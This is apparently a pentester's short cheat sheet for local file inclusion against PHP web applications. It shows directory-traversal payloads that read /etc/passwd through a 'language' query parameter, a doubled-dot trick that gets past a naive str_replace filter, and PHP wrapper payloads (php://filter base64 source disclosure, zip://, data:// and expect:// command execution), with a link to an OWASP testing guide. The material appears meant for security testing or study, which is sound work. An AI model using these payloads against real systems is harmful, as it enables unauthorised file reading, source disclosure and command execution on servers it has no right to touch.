######################## LFI ######################################
http://<SERVER_IP>:<PORT>/index.php?language=
# ../../../../etc/passwd > basic 
# ....//....//....//....//etc/passwd > basic bypass. 
# this avoids: $language = str_replace('../', '', $_GET['language']);
# use URL encoding



https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

######################## PHP WRAPPERS #########################

# PHP filter
php://filter/convert.base64-encode/resource=FILE

# PHP zip
zip:///filename_path#internal_filename

# PHP data
data://text/plain;base64,BASE64_STR

# PHP expect
expect://command


